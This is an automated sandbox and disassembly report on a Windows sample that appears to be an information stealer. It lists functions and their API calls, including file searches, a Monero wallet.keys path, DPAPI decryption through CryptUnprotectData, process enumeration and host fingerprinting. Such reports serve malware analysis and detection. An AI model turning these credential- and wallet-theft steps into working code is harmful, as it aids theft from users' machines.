Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: c63fe03b822fe3821219e2db6b24c689d5268eef0562fb07275bf34973561ff9
Instruction ID: 5f8a42fb878d67f4c683559620aff44ba35a849df166bdb96d77c1eb033d5b4b
Opcode Fuzzy Hash: c63fe03b822fe3821219e2db6b24c689d5268eef0562fb07275bf34973561ff9
Instruction Fuzzy Hash: D5915AB2A00108A7DB14FB70EC5A9FE777DAB85301F408669FD0696142FE349B4DCB96

Function 00057B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

GetKeyboardLayoutList.USER32(00000000,00000000,000605AF), ref: 00057BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00057BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00057C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00057C62
LocalFree.KERNEL32(00000000), ref: 00057D22

Strings

/ , xrefs: 00057C7F

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 842994a2e242379435a92b099618a379fdc1104aa3d442f7e31c63719040c9cf
Instruction ID: 45339d8b35807a5fd0cdd9260ca05f6e957e3da4bdeb5358f47553c0b2b572a7
Opcode Fuzzy Hash: 842994a2e242379435a92b099618a379fdc1104aa3d442f7e31c63719040c9cf
Instruction Fuzzy Hash: BB417F7194111CABDB24DB94EC89BEEB774FF44701F2042D9E90966181DB342F89CFA1

Function 0004E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00060D73), ref: 0004E4A2
StrCmpCA.SHLWAPI(?,000614F8), ref: 0004E4F2
StrCmpCA.SHLWAPI(?,000614FC), ref: 0004E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0004EBDF

Strings

\*.*, xrefs: 0004E44D

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: dc8916802a19aca0f0bed01bf1c968768493c2b0e1e2b0ad73fb9533ab431314
Instruction ID: 9a2472540f25f4653e636c5e0fa85b2289a93a8386cb8a3544299105cfd2030e
Opcode Fuzzy Hash: dc8916802a19aca0f0bed01bf1c968768493c2b0e1e2b0ad73fb9533ab431314
Instruction Fuzzy Hash: 74122371A101189ADB14FB60DC9AEFF7379BF55301F4042A9B90A56092EF306F4DCBA2

Function 00059600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0005961E
Process32First.KERNEL32(00060ACA,00000128), ref: 00059632
Process32Next.KERNEL32(00060ACA,00000128), ref: 00059647
StrCmpCA.SHLWAPI(?,00000000), ref: 0005965C
CloseHandle.KERNEL32(00060ACA), ref: 0005967A

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 63b1a7a2963342cacc272a85db2ba2d233bd39b60ce682f4b771a1c8f7ac6511
Instruction ID: e9e1a14f1adb0000c18ca7d206e5ee6561a20d43051a1fc842d7d2dcc71c8912
Opcode Fuzzy Hash: 63b1a7a2963342cacc272a85db2ba2d233bd39b60ce682f4b771a1c8f7ac6511
Instruction Fuzzy Hash: 30012179A01208EBDB24DFA5DD58BEEB7F8FF48301F104189A90697240DB349B48DF51

Function 00057A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CEEE30,00000000,?,00060E10,00000000,?,00000000,00000000), ref: 00057A63
RtlAllocateHeap.NTDLL(00000000), ref: 00057A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CEEE30,00000000,?,00060E10,00000000,?,00000000,00000000,?), ref: 00057A7D
wsprintfA.USER32 ref: 00057AB7

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 5263146952d39a33f3e1157bdb5309a48333b27031224b4e072a1c88451bd02f
Instruction ID: 3831520bc985bc7236163361ed1a2b59acd8d80fad5f304b9ced7ef72a91a9c0
Opcode Fuzzy Hash: 5263146952d39a33f3e1157bdb5309a48333b27031224b4e072a1c88451bd02f
Instruction Fuzzy Hash: 791152B1946218DBEB208B54EC49F5AB778FB44711F104396EA1A972C0D7745A44CF52

Function 00049B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00049B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00049BA3
LocalFree.KERNEL32(?), ref: 00049BD3

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 04a1fcde2e3d6f588d21e297e3654682ac4402f1290f6b0c170ce87123bbb725
Instruction ID: 06480d532d6f10814f6dd87eb971c5e846930cbb139c385b2eb838b277e1a5eb
Opcode Fuzzy Hash: 04a1fcde2e3d6f588d21e297e3654682ac4402f1290f6b0c170ce87123bbb725
Instruction Fuzzy Hash: 1711CCB8A01209DFDB04DF94D989AAEB7F5FF88300F1045A9E91597350D774AE11CFA1

Function 00057850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000411B7), ref: 00057880
RtlAllocateHeap.NTDLL(00000000), ref: 00057887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0005789F

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: fb808b4c5302ed2162e3e4c7f63890bf2b0de82186af78e0a32a82874c8b67b4
Instruction ID: fc0b3446be5adf210c1528d5b87aadf13bde63d1e9d4c0fe30d04d3b007b67ed
Opcode Fuzzy Hash: fb808b4c5302ed2162e3e4c7f63890bf2b0de82186af78e0a32a82874c8b67b4
Instruction Fuzzy Hash: 33F04FB5945208EBD710DF98ED49BAEFBB8EB04711F10025AFA05A2680CB7419048BA1

Function 00041160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0004116A
ExitProcess.KERNEL32 ref: 0004117E

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: c2d12e16f41cd65dcc9dd78a014d50eab3ddeb17b5a936a22d09c6e07b482576
Instruction ID: bfa1f227dd76b32f0dfe42cbd21a51cc8d732683b43a10143ca4e9dcb371469e
Opcode Fuzzy Hash: c2d12e16f41cd65dcc9dd78a014d50eab3ddeb17b5a936a22d09c6e07b482576
Instruction Fuzzy Hash: A8D05E7890130CDBDB00EFE0E84D6DDBB78FB08311F000555D90562340EA305481CBA6

Function 00059C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00CD5E48), ref: 00059C2D
GetProcAddress.KERNEL32(75900000,00CD5C08), ref: 00059C45
GetProcAddress.KERNEL32(75900000,00CE8D90), ref: 00059C5E
GetProcAddress.KERNEL32(75900000,00CE8DD8), ref: 00059C76
GetProcAddress.KERNEL32(75900000,00CECC08), ref: 00059C8E
GetProcAddress.KERNEL32(75900000,00CEC9F8), ref: 00059CA7
GetProcAddress.KERNEL32(75900000,00CDB028), ref: 00059CBF
GetProcAddress.KERNEL32(75900000,00CECB18), ref: 00059CD7
GetProcAddress.KERNEL32(75900000,00CECAA0), ref: 00059CF0
GetProcAddress.KERNEL32(75900000,00CECA88), ref: 00059D08
GetProcAddress.KERNEL32(75900000,00CEC968), ref: 00059D20
GetProcAddress.KERNEL32(75900000,00CD5B08), ref: 00059D39
GetProcAddress.KERNEL32(75900000,00CD5B28), ref: 00059D51
